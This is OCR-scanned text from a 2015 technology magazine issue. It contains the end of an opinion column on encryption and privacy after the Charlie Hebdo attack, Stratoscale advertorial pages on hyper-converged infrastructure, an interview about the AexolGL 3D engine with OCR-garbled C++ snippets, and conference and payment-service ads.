encryption (and of course you will have to hand the keys 
over to your ISP or whoever). The potential for abuse by 
those in a position to do so is enormous. Especially when 
the true risk of terrorism is so low. Of course, all of this 
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could change tomorrow and West could be faced with an 
onslaught — but surely the cause of all this bad blood is 
rooted in years of poor foreign policy and injustice? Is it 
not better to cure the problem rather than attempting to 
patch the wound with a band aid? After all, human nature 
being what it is, despite all our precautions, where there is 
a will there is a way. 


Sadly, | believe the juggernaut of the anti-privacy move- 
ment is just going to carry on regardless. No doubt some 
sort of technological or legal compromise will be reached, 
but in essence the shift of power and control will move 
once again in the direction of the establishment rather 
than the individual. | may have nothing to hide, but in to- 
day’s febrile political climate it is inevitable that we will 
move more and more towards the dystopian model pre- 
dicted in Orwell's book, 1984. Technology is coming more 
and more under the influence of those that wish to pervert 
an idealistic vision of a better, more just and open society. 


Attributed to the spirit of Voltaire, the phrase “I do not 
agree with what you have to say, but I'll defend to the 
death your right to say it” encapsulates the whole tragedy 
in Paris that started on the morning of the 7" of January. 
Unless as a species, we learn to communicate with hon- 
est words, integrity, humour (and dare | say it with passion 
and love) and maturely agree to disagree rather than us- 
ing violence, deceit, betrayal and duplicity we face a race 
to the bottom where history is repeated, hatred, division 
and hegemony rule. As journalists, bloggers, social me- 
dia contributors and technologists, it is essential that we 
carry on exposing the elephants in the room, challenging 
taboo’s, bringing people together and raising the bar for 
a better society, and a better world for all irrespective of 
race, creed, colour, gender, religion or personal wealth. 
More importantly, we need to pick our battles, decide the 
level of personal risk we are willing to embrace. It is not 
what you say, it is the way you say it and where that mat- 
ters. The pen might be mightier than sword, but techno- 
logical innovation is mightier than the pen. Je suis Charlie. 


ROB SOMERVILLE 

Rob Somerville has been passionate about technology since his early 
teens. A keen advocate of open systems since the mid-eighties, he has 
worked in many corporate sectors including finance, automotive, air- 
lines, government and media in a variety of roles from technical sup- 
port, system administrator, developer, systems integrator and IT man- 
ager. He has moved on from CP/M and nixie tubes but keeps a solder- 
ing iron handy just in case. 
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About Stratoscale 

At Stratoscale, we're focused on how technology can be leveraged to help IT teams make better and more profitable usage of exist- 
ing infrastructures. We know that data needs are growing at an ever-increasing pace, so we've build a hardware-agnostic and hyper- 
converged software solution that lowers the cost of scale-out and allows your IT infrastructure to keep up with business growth. 


The Product 

Stratoscale is a hyper-converged operating system software that optimizes large data center operations. Stratoscale’s distributed 
software uses the rack as its design paradigm, in contrast to the traditional, single-server paradigm — creating a totally new founda- 
tion software stack. With system-learning algorithms that allow for increasingly smarter capacity planning and resource utilization, 
Stratoscale’s operating system software enables companies to maintain an infrastructure that maximizes efficiency and operational 
simplicity at scale. 


Stratoscale provides solutions for a variety of use cases and business problems across industries. 


Big Data 
Meeting the Needs of Growing Analytical Demands Requires 
a New Software and Hardware Approach. 


Today's mobile and cloud era involves an ever-growing num- 
ber of devices and connections to the Internet. This creates a 
new challenge for IT environments, which need to handle and 
process the masses of data being produced. 


The challenge is to leverage the large amount of structured, 
semi-structured and unstructured data that is being gener- 
ated, especially in connection with e-commerce, social me- 
dia and the Internet of Things (loT). The idea is that more data 
should lead to more accurate analyses, leading to better deci- 
sions and greater operational efficiencies. 


However, most IT organizations are finding themselves faced with data sets that are too immense and complex to be processed us- 
ing most relational database management systems and desktop statistics and visualization packages. As the amount of data contin- 
ues to grow exponentially, organizations increasingly rely on solutions — such as Hadoop and Cassandra, which are built to handle 
immense data volumes — to present meaningful and actionable results. 


These emerging software analytics platforms often share one commonality: They rely on distributed and scale-out architectures. 


Unlike traditional data analytics solutions, these new frameworks perform parallel queries that run concurrently across tens, hun- 
dreds, or even thousands of servers. Successful implementations often hinge on mapping out the right strategy for deploying and 
managing the infrastructure necessary to support this new breed of analytics. 


A fully virtualized infrastructure can provide the agility needed to provision additional compute instances dynamically while also 
simultaneously allowing non-analytics workloads to run side by side. This negates the requirement to purchase and manage appli- 
cation-specific hardware. In addition, policy-based configuration practices provide the delivery of workloads in a matter of minutes, 
providing a new level of control over resource placement. 


With its innovative rack-scale architecture, Stratoscale provides the capabilities needed to confidently move ahead with any big data 
initiatives. By optimizing the deployment and management of virtualized Hadoop installations, Stratoscale allows organizations to 
get back to focusing on using big data insights to improve decision-making and increase productivity. 
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Hyper-Convergence 
Time to Optimize Data Center Compute, Storage and Net- 
working Resources. 


Converged infrastructures typically combine siloed technolo- 
gies (such as storage and compute) into a single platform, cre- 
ating an opportunity to significantly reduce both CAPEX and 
OPEX costs. Maximizing this opportunity, however, should 
not come at the expense of workload performance or man- 
agement complexity. 


Integrating compute, storage and networking resources can 
reduce IT costs, improve efficiency and create a more agile en- 
vironment. 


Basic converged systems bring storage and virtualization 
technologies together on a single hardware platform. Man- 
agement applications are used to loosely bind the two en- 
vironments together for management and provisioning con- 
venience. Some costs are reduced by having virtualization 
and storage running on a single hardware platform (usually 
a dedicated appliance); however, there are still two disparate 
operating environments, and therefore the system is not truly 
converged or optimized. 


True Hyper-convergence 

A hyper-converged infrastructure dramatically reduces these “siloed technologies’, presenting all data center components in a ho- 
listic manner. The platform acts as a single infrastructure that runs all workloads and applications. The servers, storage, networking 
and even the virtualization stack are not only bundled together, but completely integrated and transparent to the administrator. 


In a truly hyper-converged environment, rack-wide pools (or pools as wide as the data center) of compute, storage and networking 
resources are created on a single platform. Virtualized and containerized workloads are fully orchestrated and harmonized so that 
the problem of resource contention or interference is bypassed. A workload requiring heavy I/O won't impact adjacent workload 
performance. 


Stratoscale’s software creates an environment where the intended benefits of hyper-convergence can be realized. By allowing inte- 
grated technologies to be managed as a single, holistic system, the Stratoscale solution creates a self-optimizing infrastructure which 
automatically distributes workloads to run on the best matching hardware across the cluster, while constantly measuring and re- 
balancing workloads as required. When workload requirements change and rebalancing is needed, sub-second migration occurs, 
moving the workload to other, less busy nodes. 


Stratoscale’s all-software solution is built around the BYOH principle. “Bring your own hardware” allows organizations to seamlessly 
integrate existing compute, storage and networking hardware systems, allowing for unprecedented operational simplicity, scalabil- 
ity and time to value. 


DevOps vs. IT 


Creating a“DevOps" Centric IT Culture and Infrastructure. 


New application develooment paradigms create a significant challenge for IT: How does IT provide support for new infrastructure 
requirements without impacting legacy workloads? 
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The DevOps paradigm is designed to create an agile, highly responsive environment for application development, testing, deploy- 
ment and operations. This “brave new world” moves traditional IT and application developers closer together, creating significant 
opportunity for organizations to focus on creating a competitive advantage. 


In a DevOps environment, application developers focus on 
the code they write. A single application can be created and 
wrapped in a container such as Docker and rapidly deployed 
throughout the infrastructure,scaling to thousands of instanc- 
es. Orchestration tools communicate with the infrastructure 
assigning compute, storage and networking resources as 
needed. The primary motivator for the developers is the per- 
formance and scalability of the application that they wrote. 


This approach is very different from the traditional IT view. Tra- 
ditionally, IT has been primarily concerned with the utilization of individual resources or silos. Server virtualization has been lever- 
aged to improve server utilization by running multiple virtual environments on a single server platform. Separate storage solutions 
deliver the data needed; and separate network technologies are used to connect everything together. While this approach has been 
somewhat effective in the past, the world of DevOps requires a much more agile, elastic and hyper-converged approach to the in- 
frastructure. 


In a DevOps environment: 


Infrastructure must instantly be able to handle any type of workload (virtualized or container-based). 

Provisioning of infrastructure must be automatic and happen in 1-2 seconds, as compared to today's manual processes involv- 
ing days or even weeks. 

Resource utilization must be monitored in real time with balancing taking place in a sub-second manner. 


Stratoscale has developed a rack-scale, hyper-converged software solution which delivers all of the requirements of a DevOps infra- 
structure environment. By supporting virtualized and containerized workloads, while converging compute, storage and networking 
resources, and orchestrating workload deployments utilizing sophisticated scheduling algorithms, we deliver a “run anything, store 
everything” environment that is ideally suited to DevOps. 


The Cloud and OpenStack™ 
OpenStack is Paving the Way for Private and Public Cloud 
Standardization. 


OpenStack is an open source software solution that provides 
an Infrastructure-as-a-Service (laaS) platform for private and 
public cloud deployments. As cloud computing continues its 
rise in the world of IT, OpenStack has become, arguably, the 
leader and de-facto standard in the open source community. 
While still a relatively new technology, industry support for 
OpenStack has been impressive and is creating opportunities 
for new and existing vendors to market their software distri- 
butions, appliances, public clouds and even consulting ser- 
vices. 


With support from hundreds of companies from around the globe, the community of open source developers has shepherded 
OpenStack t@dits current form. By leveraging other existing open source components, OpenStack’s core platform allows data centers 
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to‘pool together large compute (Nova), storage (Swift and Cinder) and networking (Neutron) resources into a single framework. Ad- 
ditional services such as user and image management round out a suite of software services that enable data centers to be DevOpgs 
friendly and function as a self-service cloud-computing infrastructure. 


An open source alternative to more traditional systems, OpenStack has piqued the curiosity of those tied to legacy and proprietary 
solutions. The promise of high levels of customization, which are sometimes necessary to more closely match business needs, is ex- 
tremely appealing and avoids the dreaded vendor lock-in. In addition, the collaborative nature of open source projects means indi- 
vidual companies don't have to carry the full burden and costs of development by themselves. Most important, however, is Open- 
Stack’s potential for drastically cutting data center expenses — including licensing costs for virtualization and ongoing maintenance. 


But perhaps the biggest benefit OpenStack has brought to the industry is the unofficial standardization of core cloud computing 
interfaces. By rallying support across software and hardware industries, OpenStack is now the de-facto API standard for private and 
public clouds (alongside AWS). This level of abstraction is vital to the health of the project's ecosystem, allowing partners to provide 
value-added differentiation while guaranteeing interoperability with other vendors. 


With hundreds of corporations, service providers and global data centers currently considering OpenStack solutions, the real ques- 
tion may be how to successfully leverage OpenStack in order to maximize the efficiency of the data center. 


Stratoscale takes the guesswork out of deploying OpenStack clouds of all sizes. 


Stratoscale is a hardware-agnostic software stack that is 100% compatible with OpenStack. By converging compute, storage and 
networking into resource pools available across the rack or data center, Stratoscale’s self-optimizing infrastructure automatically dis- 
tributes all physical and virtual assets and workloads in real time, delivering rack-scale economics to data centers of all sizes with un- 
paralleled efficiency and operational simplicity. 


Virtual Machines vs. Containers 
Two virtualization technologies headed for a crossroads in a fight 
for dominance in the data center. 


Po. te 


Today, nearly all IT organizations have come to realize the value eee eee see c eee | 
and cost savings afforded byvirtualization technology. The prem- | 
ise is simple: Consolidate multiple applications running on indi- 
vidual (and often times underutilized) servers onto a single server, 
thus reaping tremendous hardware savings and cutting other op- 
erational expenses. 


The technology, while extremely complex, is now readily available from both commercial vendors and open source solutions like 
KVM and Xen. These hypervisors — the software that provides the virtualization functionality — are responsible for emulating the 
physical server hardware, namely the processor, memory, and networking. In addition, they enable the simultaneous operation of 
multiple operating systems (referred to as virtual machines) and their applications. 


While cost savings often drive virtualization projects initially, enterprises and service providers alike now depend on virtualization for 
their public and private cloud infrastructure because of the flexibility and security it provides. 


Recently, however, an emerging technology has been attracting tremendous interest as an alternative to traditional virtualization 
technology: Containers. While currently only available for Linux-based environments, containers resolve some of the problems typi- 
cally associated with hypervisors and virtual machines. Because of their fundamentally different architectures, containers do not 
require a hypervisor and therefore provide better performance than applications running in virtual machines. This same architec- 
tural difference also results in faster provisioning of resources and quicker availability of new application instances. For organizations 
embracing a DevOps culture, this is a great fit, allowing development teams to streamline their develop-test-production processes. 
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But containers are not a silver bullet for all IT infrastructure needs. While they are a perfect fit for deploying homogenous workloads 
(and similar types of workloads) like web applications at scale, container workloads on the same physical server share a single oper- 
ating system and are therefore less appropriate for multi-tenant environments, because of potential security risks. 


Do we really have to choose? Stratoscale allows you to run both containers and VMs on the same infrastructure. 


Hypervisors and containers are great technologies that each have a place in the data center. The challenge is how to manage these 
two vastly different architectures within a single infrastructure, instead of as individual silos within the data center. 


Stratoscale has developed a radically new approach that efficiently scales both virtualized and container-based workloads across a 
single, scale-out infrastructure, allowing enterprises and service providers to compete more efficiently through predictable perfor- 
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mance and better economics. 


The Founders 


Ariel Maislos (CEO) brings over twenty years of technology innovation 
and entrepreneurship to Stratoscale. After a ten-year career with the IDF, 
where he was responsible for managing a section of the Technology 
R&D Department, Ariel founded Passave, now the world leader in FTTH 
technology. Passave was established in 2001, and acquired in 2006 by 
PMC-Sierra (PMCS), where Ariel served as VP of Strategy. In 2006 Ariel 
founded Pudding Media, an early pioneer in speech recognition tech- 
nology, and Anobit, the leading provider of SSD technology acquired by 
Apple (AAPL) in 2012. At Apple, he served as a Senior Director in charge 
of Flash Storage, until he left the company to found Stratoscale. Ariel is a 
graduate of the prestigious IDF training program Talpiot, and holds a BSc 
from the Hebrew University of Jerusalem in Physics, Mathematics and 
Computer Science (Cum Laude) and an MBA from Tel Aviv University. He 
holds numerous patents in networking, signal processing, storage and 
flash memory technologies. 


Etay Bogner (CTO) brings over twenty years of technology innovation 
and entrepreneurship to Stratoscale. After eight years of working for sev- 
eral technology R&D startups, in 1999 Etay founded SofaWare, a Net- 
work Security company building firewall, VPN and networking applianc- 
es. SofaWare was acquired by Check Point (CHKP) in 2011. In 2006, Etay 
founded Neocleus, building the first client virtualization product, and 
pioneering device pass-through technologies. Neocleus was acquired 
by Intel (INTC) in 2010. Etay served as a strategist for Intel, commercial- 
izing client virtualization, before leaving the company to found Strato- 
scale. Etay holds a BSc from Tel-Aviv University in Computer Science and 
Mathematics. 


Sa he Team 
x ) <Stratoscale's added value is its founding team, which includes some of the most sought-after talent in the Industry — a group that 
or, 


> brings to the table prior experience at companies including IBM, Oracle, SAP. Cisco, Google, Apple, VMware and Red Hat. The compa- 


ny currently has the backing of first class investors such as Battery Ventures, Bessemer Venture Partners, Intel Capital, Cisco or SanDisk. 
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AexolGL - New 3D 
Graphics Engine 


Aexol specialises in creating mobile applications. 


It was created by Artur Czemiel, a graduate of the eee 
DRIMAGINE 3D Animation & VFX Academy, who has) # #saaeunnnns 
a lifelong interest in 3D technology. He first started aoe zn ry 
to realise his passion by working in the film industry. aca 


Artur is the co-creator of the special effects in the 0 
Polish production “Weekend” and the short film 

“Hexaemeron’, which was awarded the Finest Art 

award at the Fokus Festival and nominated as the 

best short animated film at fLEXiff 2010 Australia. 

The experience gained by working in the movie 

industry and on the mobile applications market was 

the basis for creating AexolGL — a tool designed to 

make work easier for Aexol and other programmers 

around the world. 


What is AexolGL? 

AexolGL is a set of tools for creating visualisations, ap- 
plications and 3D games with little workload. The user 
doesn't have to worry about things like differences be- 
tween OS's or hardware. AexolGL lets you focus on the 
key elements and appearance of the end product (appli- 
cation, game) instead of worrying about technical details. 


What was the main objective and the main 
incentive to create the engine? 

We wanted to create a tool for small/medium-sized devel- 
oper studios, indie developers, that would let them design 
3D projects on any platform they want. 


Why create two different engines? 
AexolGL PRO is a tool for creating games and applications | | 
natively in C++/Python, for the following platforms: iOS, Aexo/GL team 
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Android, Windows, Mac, and Linux. AexolGL WEB is used 
to create games and applications for internet browsers 
(Mozilla, Safari, Chrome) without the need to use plugins 
or simple webview apps, games for iOS and Android. 


Is AexolGL a tool only for creating games and 
mobile applications? Will it find uses in other 
fields? 

AexolGL WEB is a perfect tool for creating visualiza- 
tions. 3D technology is the modern form of presentation, 
that works perfectly for visualizing interiors, buildings 
and product models (e.g. cars and electronic devices). 
AexolGL takes website product presentation to a whole 
new level. 


Will displaying a lot of 3D graphics in the web 
browser slow the user’s computer (AexolGL WEB)? 
Most certainly not! The web engine handles displaying 3D 
very well, even on machines using integrated graphics. 
Deferred shading technology handles creating complicat- 
ed lighting models without overly taxing the hardware. 


Why use Python (AexolGL PRO)? 

Python is an easily adaptable scripting language. Being in 
line with the idea behind the engine itself (quick program- 
ming), it allows rapid prototyping of applications. Python’s 
module structure allows the addition of many prepared li- 
braries, which help make the programmer's work easier. 


How are different scenes, models etc. imported 
into the engine? 

We have integrated the ASSIMP library with our engine, 
which allows the import of about 20 different formats. 
However, because it is constantly being expanded, that 
number will increase over time. 


AexolGL 


What can you say about the engine structure? 
One of the main efficiency problems that appear when 
creating 3D projects are context changes. To minimize 
the number of costly changes, while not forcing the ob- 
ject sorting order, we created a RenderTree, which makes 
sure that operations are not repeated and are executed in 
the correct order. 


Does the engine give the user the ability 

to implement individual solutions? 

Yes, we let the user create personal solutions, write cus- 
tom shaders or effects needed for specialised tasks. 


Are there any similar products already on 

the market? What makes AexolGL stand out 
(specifically in terms of functionality) in the 
field of available solutions? 

AexolGL is primarily a tool for small and medium-sized 
projects, that lets you rapidly prototype and preview them. 
We do not aim to compete with the big engines. Ours is 
one of the select few that works on all platforms and has a 
web counterpart with a similar RenderTree structure. 


Are there any examples available? It seems 

that currently there aren't any games or, more 
importantly, a tech demo of the engine created 
with AexolGL available on the website. 

We are currently putting the finishing touches on our prod- 
uct and the website. Soon gl.aexol.com will host the first 
examples showcasing the possibilities of AexolGL WEB 
as well as the first game for mobile devices created with 
our technology, called Gravity: Planet Rescue. 


150 aex::Visual ptr LvLStarRating: :makeStarPuffVisual() { 
151 | 
& aex::Visual_ptr ret = aex::0bjectRenderNode: :MakeRenderNode(); 
153 aex::ShaderDrw_ptr shader = LvLStarRating: :PuffSprite(); 
154 
155 aex::SpriteAnimated ptr asprite = aex::make shared<aex: :SpriteAnimated=(); 
156 asprite->LoadAnimationsFromFile("Data/Asprite/puff.json"); 
157 asprite-=setCanChangeDepthTestState (true); 
158 | asprite->setCanChangeBLendState(truc); 
a if asprite->setAnchorCenter(); 
@sii asprite->scaleVerts(15.af); 
161 | 
162 | ret << shader << asprite; 
163 7 return ret; 
164 } 


Ready for instantation animated sprite object from JSON file (C++) 
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Does the engine use optimization algorithms, 
like occlusion culling? Or others like, for 
example, those found in Umbra technology. 

The engine does have the most popular optimization algo- 
rithms available. Although not as advanced as Umbra’s, 
they certainly increase the efficiency of the application. 
As we expand the engine we will certainly further improve 
this system. 


What kinds of lighting algorithms are available 
in the engine? Does it support lightmapping 

or global illumination? Do you plan on 
including realtime global illumination shaders? 
We are constantly working on scene lighting. Ultimately 
it will be one of the advantages of LightRig technology 
which creates a compact lighting model out of the environ- 
ment map, giving the illusion of GI. Currently the engine is 
equipped with several types of lighting and supports shad- 
Ow-Mmapping. 


161 void 


How does the engine model terrain? Do you 
plan on using voxels? Can you create 
heightmap based terrain? 

Heightmap based terrain creation is already available. It's 
actually a very convenient and practical tool useful in a 
majority of projects. A voxel version might be implemented 
as well in the future. 


To my understanding, the engine provides 

a joint interface that lets users create 
applications that work under both, for 
example, Windows and Android? How does it 
handle the fundamental difference in controls 
(desktop —- mouse and keyboard, mobile 
devices - touchpad)? 

We give the developer the ability to define controls on 
keyboard, joystick, mouse, and touchscreen. It is also 
possible to define a virtual joystick on the touchscreen. 
However, how the application reacts to individual signals 


162 DropyGuy::initVisual (aex::DrawNode ptr root) f 


aex::shared_ptr<aex::ShaderDrw> shadertxtptr = aex::make_shared<aex: : ShaderDrw=( 


ew J LOG("DropyGuy::1nitVisual"); 
164 
165 
166 aex: :LoadShaderFromFile("Data/Shaders/Droplet.vert", 
167 ; "Data/Shaders/DropletTextured. frag") ); 
168 shadertxtptr->setCameraPosNeeded(trus); 
169 
170 aex::ReadFromAexFile reader; 
171 aex::AnimationDrwPtr anim = aex::AnimationDrw: :makeAnimationDrw() ; 
172 reader. ImportFromAexFile("Data/Geometry/dropLlet.gex", *anim); 


173 anim- >buildPerFacePerVertexNormalLs () ;| 
aex::DrawObject ptr animMesh = anim->GetAnimatedMesh(); 


—r 
i 
al 


material->setColor(0.0, 0.0, 0.0); 
material->useDiffuse(true); 


» © 
il lc 


aex: :TextureManager& tm = aex::TextureManager: :GetInstance( ) F 


aex::MaterialShrd_Ptr material = aex::make_shared<Material>(true); 


a material->setDiffuse(*tm.GetTexture("Data/dropletCcolorMask.png"™)); 
181 
182 aMath::Vector2 circle = aMath::Math::point_on_circle(m_angle + 180.0f, m_dropyOffset); 
183 m gridOffset.x = circle.x; 
184 m gridOffset.z = circle.y; 
185 
186 [ m aex->move(m gridOffset.x,0.0,m gridOffset.z); 
187 m_ aex->scaleUniform(0.07T); 
188 m aex->rotate(-110.0f, 180.0f, 0.0Of); 
189 m timefloat = aex::make_shared<UniformFloat>(0.0f, "time"); 
190 m_aex->getUniforms() .push_back(m_timefloat) ; 
191 m visual << shadertxtptr << material << animMesh << m_aex; 
192 || m visual.SetRootRenderNode (root) ; 
193 m visual.StartDrawing(); 


A simple way of creating objects with assigned materials, shaders, geometry and transformation matrices.In AexolGL the object is ready for display 


after only 30 lines of code (C++) 
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is entirely up to its creator. By default, signals from the 
mouse and one finger touches are treated the same, how- 
ever they can easily be assigned to different actions. 


How about the significant difference 

in computing power between desktops 

and smartphones? 

Obviously smartphones do have less computing power 
than desktops; however, how the application functions on 
mobile platforms depends primarily on its design. And for 
our users, the help of our efficient solutions. 


In the currently available version of AexolGL 
WEB, you used the K-3D library licensed by 
GNU GPL. Why wasn’t this fact mentioned on 
the product page? Are the licenses compatible? 
The K-3D library is not used in the current version of the 
engine. The File loading mechanisms employed by K-3D 
are obsolete and do not support usemtl. 


Is AexolGL only a graphics engine or does 

it also handle other aspects of game creation 
(physics, optimal resource management, 

Al, etc.)? 

Aside from the graphics engine itself, our 
framework also supports optimal, multi- 
thread resource management. We intro- 
duced a simple system of creating multiple 
threads in an application and solved the 
problem of file loading on different plat- 
forms as well. For mobile platforms, we 
prepared a suitable small format for sav- 
ing 3D geometry. Additionally, our engine 
easily integrates with available physics 
engines (for example, the popular Bullet 
Physics). The engine also has an integrat- 
ed mathematical library equipped with the most needed 
functions for 3D applications: 2D/3D vector math, trans- 
formation matrices and quaternions, as well as count- 
less additional instruments e.g., color conversions, eas- 
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ing function library, Bezier and CatMull curves, and the 
ability to create simple parameterized geometry (cubes, 
spheres, cylinders). 


Similarities and differences between your 
product and the biggest player, Unity 3D. What 
is the niche for AexolGL in a market with a free 
Unity 3D? 

It’s difficult for us to compare with Unity. The idea behind 
our engine is completely different. We're not targeting the 
biggest studios with complicated and high-budget proj- 
ects. Our aim is to let small and medium-sized studios 
benefit from a quick and simple tool that will let them begin 
their journey into the world of 3D games and applications 
without straining their budget. Obviously we will also con- 
tinue to work on our project, extending its capabilities and 
broadening its use. Additionally, if we take a closer look at 
the free version of Unity 3D, we can see that the access to 
many useful functions, such as Static Batching, Render- 
to- Texture Effects, Full-Screen Post-Processing Effects or 
GPU Skinning, is only available to the paid PRO version. 


Does your product benefit from the new 
possibilities available in OpenGL 4? 
OpenGL 4 is currently only available on 
PC. Because a lot of mobile devices still 


+t use OpenGL ES 2.0, our engine is com- 
Se ee patible mainly with that API version. Al- 
ooo 080 0 though thanks to the high flexibility of the 
: = : =. + engine, introducing OpenGL4 would not 
seeree be a problem. Users of the AexolGL Lab 
ZA OL have the ability to independently adapt the 

a engine to OpenGL 4 thanks to the GL ab- 
a stract. 
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WWW.NETOPENSERVICES.COM ¢ CONTACT@NETOPENSERVICES.COM 


People are talking about 


O 
BigData TechCon! BI ID t 


TECHCON 


April 26-28, 2015 


seaport World Trade Center Hotel 


“Big Data TechCon is a great learning 
experience and very intensive.” 


— Huaxia Rui, Assistant Professor, [J 
University of Rochester 
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“Get some sleep beforehand, — 7 oie gee eZ 
and divide and conquer the packed 


schedule with colleagues.” 
—Paul Reed, Technology Strategy & Innovation, FIS 
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Choose from 55+ classes and 


Big Data TechCon is the HOW-TO technical conference 
for professionals implementing Big Data solutions 
at their company 


Come to Big Data TechCon to learn the best ways to: 


Process and analyze the real-time data pouring into your organization 


fresh air.” 
—Julian Gottesman, ClO, DRA Imaging 


Learn how to extract better data analytics and predictive analysis 
to produce the kind of actionable information and reports your 
organization needs. 


Come up to speed on the latest Big Data technologies like Yarn, Hadoop, 
Apache Spark and Cascading 


Understand HOW to leverage Big Data to help your organization today 


ol “i hg 


ly worth the 


“Big Data TechCon is definite 
investment.” 


— Sunil Epari, Solutions Architect, Epari Inc. = 
P P Big Data TechCon is a trademark of BZ Media LLC. A Event 


Meet the 
Developer-Friendly 
Payment Solution 


' a 
Payment flow 


Conversions 
Payment page 


With Gate2Shop, you can optimize An effective payment page variant With dozens of alternative and local 
your payment pages by using testing tool, A/B Testing helps you payment methods offered in 
ready-made templates or by gain insight into user behaviour, multiple currencies, the personal- 
customizing payment pages to your increase payment conversion in the ized checkout allows you to reach 
site look and feel. short and long term. users from all around the world. 


wW Easy integration wW Cross-platform ewWSecure 
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Sell. More. 


Call for a free consultation: +44 20 3051 0330 
WwwWw.g2s.com 


